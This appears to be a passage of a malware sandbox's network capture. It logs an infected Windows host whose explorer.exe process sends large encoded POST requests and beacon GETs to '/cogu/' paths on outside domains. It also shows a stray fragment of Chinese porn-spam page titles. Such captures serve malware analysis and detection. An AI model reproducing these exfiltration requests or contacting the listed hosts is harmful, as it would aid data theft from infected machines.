content="野花视频在线观看视频_谁给个网站啊急急急2021_水原梨花肉欲在线&#2577
Oct 13, 2021 15:53:00.043380022 CEST	7927	IN	Data Raw: 33 3b 26 23 32 35 39 31 38 3b 5f 26 23 32 31 33 32 30 3b 26 23 32 32 38 31 32 3b 26 23 33 31 31 36 39 3b 26 23 32 30 31 35 34 3b 26 23 32 35 31 30 34 3b 26 23 32 34 31 38 30 3b 26 23 32 34 34 33 33 3b 26 23 33 38 34 39 38 3b 26 23 32 32 33 31 32 Data Ascii: 3;放_午夜私人成年影院在线观看BT _最大胆的裸体西西艺术44_日韩a?&#1

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.11.20	49846	198.54.117.210	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:53:05.228328943 CEST	7996	OUT	POST /cogu/ HTTP/1.1 Host: www.domainair.biz Connection: close Content-Length: 131140 Cache-Control: no-cache Origin: http://www.domainair.biz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.domainair.biz/cogu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 45 36 3d 59 57 36 50 6a 51 36 4e 4c 51 43 30 58 6b 73 33 4a 64 5a 6e 5a 77 52 43 61 71 67 4d 65 44 46 67 37 44 36 36 4f 52 35 78 53 53 54 68 43 74 36 53 65 33 6a 44 67 37 30 46 35 78 78 49 31 77 7e 6e 44 6c 35 63 31 30 6c 36 66 49 52 7a 50 67 79 63 72 7a 71 54 45 54 28 4b 65 38 54 52 49 52 55 69 79 37 4b 47 51 5f 78 39 79 6b 43 72 56 62 34 39 44 5a 36 6d 32 59 5a 71 65 6b 43 69 51 48 39 69 30 39 54 72 55 35 44 73 5a 48 79 41 78 53 61 37 34 4d 4e 6a 54 66 52 2d 53 59 46 4e 36 45 69 37 4e 67 64 68 72 59 7e 68 6d 36 7a 63 72 7a 52 6d 4c 51 4a 4d 45 6b 46 53 37 77 53 42 39 46 7a 79 4f 33 62 54 4d 73 66 65 41 34 49 62 42 50 51 79 70 63 49 49 32 69 47 46 47 6f 36 61 38 5f 50 78 4c 48 77 31 36 78 53 7a 6a 71 74 30 31 39 61 6c 57 51 42 4a 6e 61 38 62 69 56 54 55 77 46 7a 78 61 78 7a 6e 49 35 6f 54 55 4e 36 35 45 73 6a 4c 6c 72 65 73 7a 63 78 79 46 65 68 41 43 66 66 52 59 39 71 78 45 49 30 77 49 2d 7a 4d 78 4b 71 72 76 46 63 35 4d 64 72 4d 56 33 6e 5f 43 4d 48 54 65 45 38 2d 75 6a 36 52 50 4d 36 2d 28 51 64 61 5a 59 46 5a 7e 69 43 63 62 34 44 4c 63 7a 4b 2d 47 35 4f 61 68 4a 52 58 4c 56 63 33 31 37 66 77 4e 77 5a 6a 4b 4d 6e 66 73 6b 4e 31 71 6f 39 5f 43 55 6d 47 71 34 62 6a 46 56 39 47 41 6a 71 30 4f 6a 38 6b 36 4f 7a 39 45 53 51 41 4c 71 6d 45 55 73 6b 4d 47 31 4e 43 37 4a 36 70 50 4b 39 53 53 6e 6e 44 36 5f 6c 46 4d 61 6f 41 63 54 72 2d 4c 4b 6d 2d 69 75 50 36 54 79 6e 48 54 44 32 5f 33 58 49 67 74 71 76 78 5a 53 7a 5f 41 52 69 4b 49 7a 35 73 64 63 67 31 41 58 73 58 44 45 32 53 7a 7a 4e 6a 49 4b 52 67 62 79 72 4e 65 72 54 39 32 57 28 4a 62 34 37 41 75 58 4c 4e 48 6c 43 4c 48 4a 71 59 65 2d 28 47 7a 68 6d 59 63 64 7a 34 75 61 72 67 69 41 71 6f 36 2d 33 59 69 59 4b 64 77 34 78 58 39 59 39 6c 74 6d 58 5a 7a 78 76 4e 6a 32 76 68 52 4e 4c 6f 64 77 61 4c 65 5a 58 73 35 46 6a 73 67 34 58 50 61 2d 69 38 64 43 78 2d 49 4c 6e 37 34 57 73 5f 61 63 69 6f 78 33 43 61 4a 47 58 35 77 30 77 36 50 56 66 74 39 6b 4b 67 73 6d 4d 49 38 66 4a 6a 54 51 4d 57 73 51 46 4c 43 62 6e 62 70 6d 42 70 42 58 5a 34 33 5a 34 59 4f 38 35 68 30 61 30 71 55 65 6c 62 4e 5f 78 6c 30 70 62 36 30 2d 51 51 43 4d 31 6d 35 42 50 37 4b 34 49 30 66 34 42 6b 6c 55 31 33 79 34 49 48 55 6d 62 65 6b 44 31 76 52 32 71 65 73 2d 59 6a 53 77 71 4e 72 62 4a 59 4b 6e 4f 56 47 52 62 36 43 55 36 63 56 4e 5a 33 71 5f 46 31 4f 42 43 65 30 64 5a 4e 4d 64 68 42 79 75 34 4e 66 6f 5a 53 28 57 61 72 51 59 32 6c 75 45 64 30 7e 34 33 59 62 68 7e 34 43 48 4a 38 39 4e 44 67 76 71 66 43 47 5a 54 5a 4e 4e 52 70 34 6c 65 49 54 47 64 76 76 77 52 68 61 37 55 58 44 51 49 6d 42 61 42 4b 67 42 4a 6f 4a 6f 78 58 30 39 6d 79 31 45 6c 50 39 77 6e 4b 74 53 36 71 47 47 49 36 4e 36 44 75 78 74 6f 53 28 66 59 66 66 4c 6c 6f 36 73 38 4f 66 49 6d 59 68 6f 66 62 6d 38 32 6f 46 41 77 76 72 39 66 73 4a 54 59 64 73 71 70 4e 71 6c 4a 5f 37 78 55 73 75 50 4b 32 28 50 37 73 54 5a 55 35 63 4c 6d 33 39 57 4b 36 53 63 56 38 55 6d 4d 4f 73 76 58 35 75 78 4d 6c 41 42 4d 51 6f 51 69 5f 48 39 59 6e 30 61 61 50 42 54 78 49 7a 5a 46 74 4c 54 69 4b 68 30 5a 6c 4f 4d 4c 35 75 31 52 6a 78 71 44 53 55 5a 69 74 56 68 47 77 35 74 54 61 57 78 69 6f 51 38 6c 30 59 43 6c 4d 68 53 57 56 68 56 5a 32 76 4b 49 4d 74 76 64 6c 6f 31 77 34 32 45 46 34 41 65 35 30 28 56 70 56 49 2d 54 49 38 36 7a 4b 48 79 78 69 32 49 73 55 69 64 4f 34 37 73 52 4f 65 77 38 30 52 76 46 38 6c 46 52 30 4e 77 66 55 4d 71 6d 48 6f 41 41 6a 57 4a 57 61 67 4f 33 73 46 64 52 34 68 6a 66 71 51 49 67 79 52 67 6c 49 36 47 6c 41 57 64 58 37 47 58 66 61 59 6d 73 47 4d 69 59 36 54 72 61 4e 43 78 28 68 6f 53 6a 31 4e 55 74 63 35 54 69 47 74 77 63 66 68 4b 53 6d 6b 56 64 52 43 4a 76 39 4a 46 55 51 48 44 76 61 56 31 4a 72 67 6e 65 66 65 52 64 38 79 67 39 2d 75 2d 34 71 39 57 7a 47 30 36 48 63 52 55 49 46 4b 55 28 45 48 68 4b 30 5a 49 65 62 4d 4e 63 76 54 54 6e 4b 43 6f 7a 5a 59 59 63 76 33 63 44 7a 76 46 55 32 62 36 73 6d 67 77 55 75 75 50 41 77 67 64 6d 37 36 46 4c 50 78 66 4e 69 37 64 50 4c 4b 70 59 30 54 44 44 73 71 73 4e 70 50 71 74 43 68 44 6c 50 6f 72 4b 49 44 6b 63 6a 49 63 65 71 4e 58 39 78 70 6e 38 57 7e 6f 6e 35 79 46 62 6e 7e 71 35 4e 77 50 6d 47 75 31 70 78 Data Ascii: E6=YW6PjQ6NLQC0Xks3JdZnZwRCaqgMeDFg7D66OR5xSSThCt6Se3jDg70F5xxI1w~nDl5c10l6fIRzPgycrzqTET(Ke8TRIRUiy7KGQ_x9ykCrVb49DZ6m2YZqekCiQH9i09TrU5DsZHyAxSa74MNjTfR-SYFN6Ei7NgdhrY~hm6zcrzRmLQJMEkFS7wSB9FzyO3bTMsfeA4IbBPQypcII2iGFGo6a8_PxLHw16xSzjqt019alWQBJna8biVTUwFzxaxznI5oTUN65EsjLlreszcxyFehACffRY9qxEI0wI-zMxKqrvFc5MdrMV3n_CMHTeE8-uj6RPM6-(QdaZYFZ~iCcb4DLczK-G5OahJRXLVc317fwNwZjKMnfskN1qo9_CUmGq4bjFV9GAjq0Oj8k6Oz9ESQALqmEUskMG1NC7J6pPK9SSnnD6_lFMaoAcTr-LKm-iuP6TynHTD2_3XIgtqvxZSz_ARiKIz5sdcg1AXsXDE2SzzNjIKRgbyrNerT92W(Jb47AuXLNHlCLHJqYe-(GzhmYcdz4uargiAqo6-3YiYKdw4xX9Y9ltmXZzxvNj2vhRNLodwaLeZXs5Fjsg4XPa-i8dCx-ILn74Ws_aciox3CaJGX5w0w6PVft9kKgsmMI8fJjTQMWsQFLCbnbpmBpBXZ43Z4YO85h0a0qUelbN_xl0pb60-QQCM1m5BP7K4I0f4BklU13y4IHUmbekD1vR2qes-YjSwqNrbJYKnOVGRb6CU6cVNZ3q_F1OBCe0dZNMdhByu4NfoZS(WarQY2luEd0~43Ybh~4CHJ89NDgvqfCGZTZNNRp4leITGdvvwRha7UXDQImBaBKgBJoJoxX09my1ElP9wnKtS6qGGI6N6DuxtoS(fYffLlo6s8OfImYhofbm82oFAwvr9fsJTYdsqpNqlJ_7xUsuPK2(P7sTZU5cLm39WK6ScV8UmMOsvX5uxMlABMQoQi_H9Yn0aaPBTxIzZFtLTiKh0ZlOML5u1RjxqDSUZitVhGw5tTaWxioQ8l0YClMhSWVhVZ2vKIMtvdlo1w42EF4Ae50(VpVI-TI86zKHyxi2IsUidO47sROew80RvF8lFR0NwfUMqmHoAAjWJWagO3sFdR4hjfqQIgyRglI6GlAWdX7GXfaYmsGMiY6TraNCx(hoSj1NUtc5TiGtwcfhKSmkVdRCJv9JFUQHDvaV1JrgnefeRd8yg9-u-4q9WzG06HcRUIFKU(EHhK0ZIebMNcvTTnKCozZYYcv3cDzvFU2b6smgwUuuPAwgdm76FLPxfNi7dPLKpY0TDDsqsNpPqtChDlPorKIDkcjIceqNX9xpn8W~on5yFbn~q5NwPmGu1pxFkgaLlQxBnSIjchZzqtkWm0PqVSewCst5qOSZTHmoDOLdG3J8QN6Pg8vzsX1jVvjunld7AnmFp1fZEGwxxNqaNKaOmlQ(y6CF9F4PBfG8oYpORxLvr0pxud0xRNfJSJyeU17cqSvYk4V8FvpeUSLtCm0o_CQv1Gh914-sQCepAYce4j7pCivbgrrxPWomYTj7rjDFhxkwrfy4SyE5RNWHTBlI0RTiB3F0Dl_e0nVdz7H8w7n6Q~KsF9tHIJDIuavuSsK0MytWWMM9bXhHiLDkkkg(jhVGKnd2XinGF0JbXfVqa4aiAk44IbfEZ08GFFzjAzqC-g0LKOuOZCnyEN_r4h5bqehmGxK5Iz2(37s6vlxKRUljYj7CYviQiLTOsDrt1js2Gr9GMMeW0P2IhCPiAmbmeG5Kmv0FePapom480NeEXteIxA2nyR-REOahlGLg3WrAt2qxL9GV98b5jdEBcD8sCR3zT8NOaxmrQOLOiBflB7KXeZkMTAo6tNg1jxsveLlsK3c5Me-t4npnw7NhWw3ldLtc1S-qxP4kS45IWvLG6EGiSeSHRebkrffA0AfLDrcbmW-MPIRLSSv6EvBzQchd4FkSxNAXDYum0UHZgtoi82VXn8Lakf-7oIFrTzZKnIWjCpmNp43Bk7fMT46oRQodSSMntRNRf6DhxUAZL2UUxyxngprQO8ZNQ5HS9YacI~r(35ol1Egzq(i8e1ZhC6NVmaAudm2URfb6JvSEbPP3LJUCYPt9oPbGTN-Lp60UEurY_6jAVuVgfyPaoIuzACg2pV9Y7RhKjp3mW1Hf0gJV_GcdMFBq-WiMCbCKqQG6GsvkGLdnC(tXOaiFsqwuTBR1XEQmCgeJu6UpK9hnErdP-xl~lwmsGRNSVvVYGxZLIm-x7i_mgrnS1ip8Ek7psm6E0oo1GXiNHt-awI-Vryafdtv3a0da5Fa2yzu799W198IpslNL493kDE2Z7xFLy1yCiNlRtIJabuAaM86lcEFwmC8dPpKVm4i9HUpBb(xQ-g6ahQSXv7cztWtX5HBq292hGiZj1oMzsMBeP4pkI5m1bMe9uESyayEvtLbxL9R2eTVpZTpCeTHe2oF85g8Ci07rwc10g~7bEZ6pX8vj22240u6X1aL~47qLbdUOCTxyISDI4lwPVTfSs9GEUN9X1tC9-LjOfYtmSYpVgLJSQIJ262myXc9OsBlx_txQ-wmG9F8VTKm3t6HqvovVPCnrIuUar(cdcjbhreIQ67OUDTfA0INkJNM(YVJGIMt1u2oAVlXI2yDxdZhaZCITDbynsPIGJd3WDeXJjBpLHpC6G5JayvEcpEZyA4sKgEOfJwWP2JWvIAvMsY66E08jFaUngbQKoM_aerC5amAg4eaJrAPd97AMV6w0-12rtGyOu8JLfFgjZXp~wPzfkiqfOcd0akZq0UL5uXJet0XjkBWufyykSzVnx0yfVwHjyf0QcWw5uYZlLvx0kcly6R0k0kLdZVI1vTkaFQDoFRKjXBg6cxCWukihLPPG9hJHvv1BxdZr92EhJ8KZkUM1GhfO6IIH0FhAIGWxquTqHoEFFUzKfn8sUFKPdu5SbOISaaPA_05R3XiigRw60L9~vbM4uDI4OgQZcAJgUfrX5l0rJCI1pZkpiqBoG2EltwFb8lYKn9WhVjoocreKQ2lrg9vryBSWOlvwUvLj-om7iYucneogiVpoZpaorECpvD3rb7tldSSMKYQSOkZCjvl3s5MJA~TVaH2rsidQ2ecz6iVp4NBnILZ65fV49aXOMML08lyY4QY7GTbMg2mJgjCZneg4Jn5lRaqsgUguuzrEGaMwV1ACu6goEA5nzLmqbqjdmn8yMAK74dCxaGwFoBM4CfaYIv7tJaE07aDdnMAR9rBboOgjajzAwps8QIhRtRgkXx7sSs6uqqcn5PmxNlsgXsJpZmuzl37RNE_~E2kXDuB9qmZ25OmS3eWLWu2RwonB20B6Qtz5qUZ(17uMSoxvgnkuxCu6-eQufJ5Wwadx395wytXvHxAJTOU(WzyBtsZVDpThG0wT6171nR80J~My3Dfu-QernOALw0g9_tRYn5cCDGWHcTjCr8qSsSPzfxuP5X1Zq(lrmZ2SE7P2vGo(06yTO2oX7Q3ufJ5B_hB1wLr6LKzu38pUduzXcdqz487e4Ev9Kn83p1pn8Dy1qLgCmQ6fpD_RuGGQyXmT7NbXmMNc7oV3g7pa_HYghUTmFXPrWvskiNQbJUlPTkM(0yz90syczm7HLtocIms(ZMqDOCg~LHJ1UH_OGOIE-sUBlm6M5bw9K(GHfwquIXChmjA~BgELJ4v4jnonbvbNcDk3LdeKXctxY07agSSZdhaqGruqCVyonw_jU578m4zvg2hWh~PSn14sVG1tPmX8iuzpAnQlajlkyW90RD5NnAiWpWVPz6PeFnjf904ph3ga29HIqnx5eSg24ixC-GbUKzlYN4VuSOrhodHz0(f3XRtVsdvjp4e053D(S871SX5QMVsxh30elXbzBPdZynAjEtHgKgcMIwo~5SnibWuwSC5HIYfyIQiPXzHLqjvfGQW9h5dXWLeKgqnkk4VunokR0wlFUfp1aDYlpp3rp~YhtktMTzSCG7_1xDO7_bBn5bvc63yiYBkt6DFb67LrthotqBPxZSi06klYW9fuTRKEeK53u6OI74Ro-(YRFX2(910KgQMzoXB9_7w3vwrlboMcmRZryl
Oct 13, 2021 15:53:05.228396893 CEST	8001	OUT	Data Raw: 50 59 51 77 46 58 66 48 6a 38 56 56 64 76 43 66 79 52 37 74 4b 72 72 69 53 7a 31 72 4d 66 4b 65 62 4c 70 7a 70 4b 73 53 2d 61 41 30 30 4d 47 43 37 6e 51 79 4c 32 37 77 44 36 4c 76 36 39 6f 76 50 6a 32 6b 6b 66 42 38 4d 55 78 74 74 77 50 49 31 59 Data Ascii: PYQwFXfHj8VVdvCfyR7tKrriSz1rMfKebLpzpKsS-aA00MGC7nQyL27wD6Lv69ovPj2kkfB8MUxttwPI1Yc4Fdm5x2pyLTMjgWkx-z3WXPHCM9Kgu(DWDu7x-uOzVusadDLeoGK6B7AmTB_WthSilU-wOKR5yvlUNSgurAZx3qlNyjUEX2w4xZQpDY0bBEflmEKCycdIw121Jw5KnLOp1WViuIX6UIGJxgYefaPZUT-4JlECH3P
Oct 13, 2021 15:53:05.395237923 CEST	8002	IN	HTTP/1.1 405 Not Allowed Date: Wed, 13 Oct 2021 13:53:05 GMT Content-Type: text/html Content-Length: 154 Connection: close Server: namecheap-nginx Allow: GET, HEAD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
Oct 13, 2021 15:53:05.395364046 CEST	8005	OUT	Data Raw: 4a 69 30 58 49 28 30 46 54 33 34 4e 79 56 5f 36 4c 56 51 31 50 49 64 73 6e 52 67 36 6a 6a 41 37 42 58 61 6b 58 51 71 50 55 31 4f 50 45 6a 38 37 79 7a 66 58 63 32 63 73 30 4c 50 64 6c 56 56 55 36 4c 61 66 6c 39 77 65 6e 31 5f 67 73 4d 33 35 70 28 Data Ascii: Ji0XI(0FT34NyV_6LVQ1PIdsnRg6jjA7BXakXQqPU1OPEj87yzfXc2cs0LPdlVVU6Lafl9wen1_gsM35p(ZJr32xtKLodHH5xhHVLWZFv~EiC1Gw-VINy9cTG29d8iSOuv8SOkMiODGc5zPjW63qrt_IJomQl0qdFXXnMql~fo6i6phcEKuUDQWgamzKAb4nItetGVPynB4IxnTiu(Q4P341OjkbTiCfuvdgNx3IONMRB1XFiqr

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.11.20	49827	172.217.168.33	443	C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.11.20	49847	198.54.117.210	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:53:05.395910025 CEST	8005	OUT	GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1 Host: www.domainair.biz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.11.20	49848	204.141.43.204	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:53:10.739622116 CEST	8018	OUT	POST /cogu/ HTTP/1.1 Host: www.nazfoodstuff.com Connection: close Content-Length: 131140 Cache-Control: no-cache Origin: http://www.nazfoodstuff.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.nazfoodstuff.com/cogu/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 45 36 3d 43 6d 6f 71 70 50 7a 6c 4e 68 55 38 65 76 78 55 39 4f 6f 59 4a 38 4a 50 78 55 6b 6d 31 49 79 45 35 68 78 6f 79 53 4b 74 58 49 62 33 48 73 57 78 51 76 4f 65 6e 36 4e 4f 46 59 33 4c 37 46 7e 35 59 44 7e 43 56 6e 31 52 62 4c 71 73 74 6f 41 79 65 4e 4b 4a 64 54 47 31 78 54 6d 58 47 5f 46 64 45 72 57 73 43 61 30 67 57 54 54 6e 50 4c 51 33 6b 38 52 7a 71 35 62 53 51 52 53 78 33 72 6b 45 65 53 32 79 68 4e 6e 4f 32 54 35 5a 53 32 4a 4c 4a 38 44 2d 45 6c 38 64 72 33 4d 32 46 68 73 37 4b 6a 6b 5f 63 57 41 58 59 30 78 61 62 5a 6b 36 77 55 64 33 6c 4c 56 46 61 37 71 65 6f 72 4a 4d 47 4c 4c 72 51 71 75 75 58 48 64 5f 6e 6c 59 57 76 67 61 46 4b 79 62 72 36 6c 68 77 37 68 51 33 47 70 34 31 66 77 4e 69 35 38 39 34 59 5a 59 38 7a 53 28 6d 4b 6c 46 6b 64 74 4a 6d 76 35 68 30 30 48 50 63 6b 6b 57 32 28 53 7a 58 33 6f 53 43 63 37 49 7a 6f 52 34 63 36 73 36 6f 7a 79 50 49 6b 64 74 79 76 36 4e 70 66 58 49 50 79 6a 50 4d 73 70 31 69 48 63 6b 57 66 4f 6c 36 4f 34 32 41 39 34 5a 62 72 46 79 64 62 6d 6b 76 6c 7a 36 35 34 34 5a 74 78 43 36 54 69 79 76 54 50 63 44 35 4d 31 49 75 4d 4b 6e 67 49 43 52 61 64 49 58 46 4c 79 64 31 38 5a 66 57 51 64 64 50 76 49 5a 6d 4e 52 37 55 28 78 51 47 62 76 32 68 44 6b 7e 33 77 46 6a 2d 45 68 54 45 69 68 76 74 6e 42 78 32 73 79 57 78 55 44 54 73 4f 37 37 78 6d 52 6d 4c 61 77 42 45 6b 64 56 33 57 6c 52 77 50 7a 6b 7a 5a 69 73 54 77 2d 42 46 76 75 38 75 62 4d 73 4d 63 49 54 57 46 45 36 39 71 7a 73 66 48 6b 50 75 6b 5f 30 56 62 30 4d 6d 58 33 44 2d 70 38 74 5a 79 78 33 57 43 64 4b 38 74 41 36 76 76 4e 45 68 4c 4c 6c 54 69 66 76 77 61 6c 67 45 45 7a 53 79 6d 65 70 6e 58 54 6a 4b 53 34 79 73 6d 4f 32 70 35 39 75 65 48 69 67 30 56 4d 71 54 4f 50 67 53 39 36 53 57 44 48 5a 74 53 4c 50 74 6c 31 33 58 67 44 45 34 6d 62 70 38 73 30 45 6f 52 62 51 50 79 65 4e 5a 67 44 47 7a 31 63 58 39 5a 47 73 44 6b 67 56 76 6d 35 69 43 5a 62 7e 74 41 77 38 70 35 36 76 7a 42 4e 28 66 55 39 65 2d 5a 69 7a 66 6c 5a 51 53 46 51 45 79 47 50 49 4f 62 35 33 5a 68 79 6e 30 4b 63 30 7a 7a 4f 35 39 69 2d 73 64 6a 45 62 35 30 42 7a 49 56 66 72 42 49 78 7a 47 39 51 78 31 6f 43 46 61 5a 31 51 6a 62 72 4a 71 46 61 63 45 6f 44 6a 38 6f 57 76 68 73 58 64 6e 30 30 6b 49 35 55 59 38 46 39 38 58 62 44 41 7a 4f 59 32 79 59 51 67 4a 5a 32 50 70 74 59 47 41 7e 41 75 33 58 37 42 78 30 37 4f 7a 75 50 42 6b 34 4a 45 41 30 76 4a 54 41 68 34 38 72 37 76 64 73 4f 34 4c 4f 6d 72 41 53 42 36 66 62 4a 55 33 4a 48 55 39 4d 50 62 65 4a 52 7a 49 73 6c 51 37 47 34 75 57 66 34 69 6e 28 41 4c 42 34 67 43 76 69 35 47 37 6c 73 37 34 55 71 4d 5a 49 51 4d 48 43 74 56 68 65 70 64 6b 78 49 52 50 4e 57 53 6f 73 32 48 38 6a 51 75 44 36 6b 66 36 63 53 62 7a 71 70 39 48 6e 35 6f 55 78 48 70 57 4b 7a 7a 31 57 4e 50 6c 48 42 39 58 46 64 4f 61 4b 37 51 70 38 67 4b 7a 6f 79 7e 56 6b 43 6d 63 62 77 37 48 34 78 37 4c 31 45 36 45 50 54 67 6c 34 59 68 48 38 49 50 42 30 70 55 43 30 61 73 66 71 58 78 76 76 50 44 73 77 6c 4d 69 32 67 6c 68 4c 30 47 4b 55 61 59 6e 30 42 50 7a 31 65 38 68 39 35 62 39 55 76 6b 35 5a 6c 71 38 73 54 47 4e 74 33 64 68 79 58 71 37 68 73 48 35 38 67 43 59 58 69 34 53 6d 74 6d 56 6f 54 43 6c 69 77 44 72 36 48 76 65 42 4c 4b 34 66 68 53 62 52 71 41 6b 48 6a 75 71 41 74 6f 4b 76 6d 47 30 6e 6d 32 74 72 79 4f 4a 5a 55 43 2d 48 59 7a 45 71 4b 44 68 79 6c 39 32 38 38 57 5a 56 46 76 44 56 74 51 62 5a 54 72 38 28 38 7e 51 66 78 69 71 4a 4a 6f 61 54 46 44 2d 31 69 71 49 61 61 6d 57 71 79 58 58 63 6e 41 6c 48 66 59 6a 55 37 61 6d 35 75 42 64 53 46 41 30 76 77 55 43 7a 62 7a 69 56 32 58 35 62 62 76 39 49 7a 7e 32 28 57 6a 77 58 61 48 4c 70 4c 4e 58 5a 5f 56 76 31 4a 39 47 4c 44 41 45 6d 34 7a 58 72 2d 39 63 37 65 49 48 39 6b 48 46 70 69 36 6d 30 78 62 72 72 33 38 48 43 79 39 54 38 46 54 70 35 62 4c 33 51 64 47 52 69 53 64 46 78 7a 56 65 72 62 34 41 4f 52 50 49 4e 64 50 63 58 4d 76 68 62 4f 31 75 6b 62 73 5a 51 38 28 68 31 52 30 69 42 7a 6d 61 6a 4c 49 32 47 52 58 47 77 74 63 59 42 42 49 36 30 6e 62 53 28 73 4d 45 53 47 58 6a 57 63 78 53 6f 76 67 36 68 35 73 6d 5a 63 39 49 73 37 52 6b 64 5a 76 51 66 42 34 31 75 35 39 38 70 66 56 36 67 4d 31 75 50 6c 46 57 54 76 71 58 Data Ascii: E6=CmoqpPzlNhU8evxU9OoYJ8JPxUkm1IyE5hxoySKtXIb3HsWxQvOen6NOFY3L7F~5YD~CVn1RbLqstoAyeNKJdTG1xTmXG_FdErWsCa0gWTTnPLQ3k8Rzq5bSQRSx3rkEeS2yhNnO2T5ZS2JLJ8D-El8dr3M2Fhs7Kjk_cWAXY0xabZk6wUd3lLVFa7qeorJMGLLrQquuXHd_nlYWvgaFKybr6lhw7hQ3Gp41fwNi5894YZY8zS(mKlFkdtJmv5h00HPckkW2(SzX3oSCc7IzoR4c6s6ozyPIkdtyv6NpfXIPyjPMsp1iHckWfOl6O42A94ZbrFydbmkvlz6544ZtxC6TiyvTPcD5M1IuMKngICRadIXFLyd18ZfWQddPvIZmNR7U(xQGbv2hDk~3wFj-EhTEihvtnBx2syWxUDTsO77xmRmLawBEkdV3WlRwPzkzZisTw-BFvu8ubMsMcITWFE69qzsfHkPuk_0Vb0MmX3D-p8tZyx3WCdK8tA6vvNEhLLlTifvwalgEEzSymepnXTjKS4ysmO2p59ueHig0VMqTOPgS96SWDHZtSLPtl13XgDE4mbp8s0EoRbQPyeNZgDGz1cX9ZGsDkgVvm5iCZb~tAw8p56vzBN(fU9e-ZizflZQSFQEyGPIOb53Zhyn0Kc0zzO59i-sdjEb50BzIVfrBIxzG9Qx1oCFaZ1QjbrJqFacEoDj8oWvhsXdn00kI5UY8F98XbDAzOY2yYQgJZ2PptYGA~Au3X7Bx07OzuPBk4JEA0vJTAh48r7vdsO4LOmrASB6fbJU3JHU9MPbeJRzIslQ7G4uWf4in(ALB4gCvi5G7ls74UqMZIQMHCtVhepdkxIRPNWSos2H8jQuD6kf6cSbzqp9Hn5oUxHpWKzz1WNPlHB9XFdOaK7Qp8gKzoy~VkCmcbw7H4x7L1E6EPTgl4YhH8IPB0pUC0asfqXxvvPDswlMi2glhL0GKUaYn0BPz1e8h95b9Uvk5Zlq8sTGNt3dhyXq7hsH58gCYXi4SmtmVoTCliwDr6HveBLK4fhSbRqAkHjuqAtoKvmG0nm2tryOJZUC-HYzEqKDhyl9288WZVFvDVtQbZTr8(8~QfxiqJJoaTFD-1iqIaamWqyXXcnAlHfYjU7am5uBdSFA0vwUCzbziV2X5bbv9Iz~2(WjwXaHLpLNXZ_Vv1J9GLDAEm4zXr-9c7eIH9kHFpi6m0xbrr38HCy9T8FTp5bL3QdGRiSdFxzVerb4AORPINdPcXMvhbO1ukbsZQ8(h1R0iBzmajLI2GRXGwtcYBBI60nbS(sMESGXjWcxSovg6h5smZc9Is7RkdZvQfB41u598pfV6gM1uPlFWTvqXs2r8NFuiQ-1rbBvk9NOxvNMPBWaLeYZNTZ9E6kgzNM73DnettnW6iV5yTvf4vshUj4BW13jPRajxtKcCaRki2yYzxDlCn0CDIBzmmDoUP_4_vHEhw4nUVIz3i-eQyxYH3CO0BvkKIYVTTbKncnzIgY8MYPOn2pUnvDpZsSszgNLPf0K7MawwCAMc6wWBE2cG1RbsvCrNVYP38PD2XZQSQ8KQJ3eTnK5m5k8ipXQv4sAYGl7HLjoZErfJE9nbb452O4Rfgv~dgfSaAJsBw9ZEbJhDZv(ZUm8Z8Gv1JnOZap7eaEUOe_G-CRrM2srrAADXXv517r2VmzpjUdjMA28-X6PvUHWsU-iO3HczU4EYYl2EWWqiRRHks7euc151FgmPwAxc3-L_7L1ZN9grCkwcK8QoUd4XLuDAX5UEdYnjgMBLI43pqhzOjeT9GypTE5bArQcvF2H_SwK-~Rjw68lgWzFlVFfRCE(Em7xQiNbjdB(RF0RJvn55zHZio4DX~0DagdA23v3VSAEk~bC1uW2vq2wlH5teepjETNwsqzzU6dUE5gGw0pJeWCVw3KQ3efqP3gHC9Jsr3EVSrrwKMDZ4SiaDe_MFvGZ8vb3Senk2z20EkVAXGM~65CqhmNEVMZPx1HYPCt5LZW6lh3DstUH4VKSLwUOmYuGRCl17eAAxa25F6wzWl2xlrNfxRt(hONG_7ogHj8cXyMRQe0Zpk_cvNJy2nIwMpqlc6kd3SPSVQlUjAMe2xHWDjNbX41IOe0gPjlsKcsG9LMqpfKm3GR5LEHmWQfHQD4S7gnqxceCvOMntJdcwZsKbVNtjaYen5q4gexTXXNU-zxKNnZG85MaQnM79yIiuFFJl85S5MbCZ6EDh3rN8Whhj2T87CubC1HiSeXiu3dfXUZDZQAoIK3iOPC0cqDNifvOaWROO5LRDsuYHrh2M~TS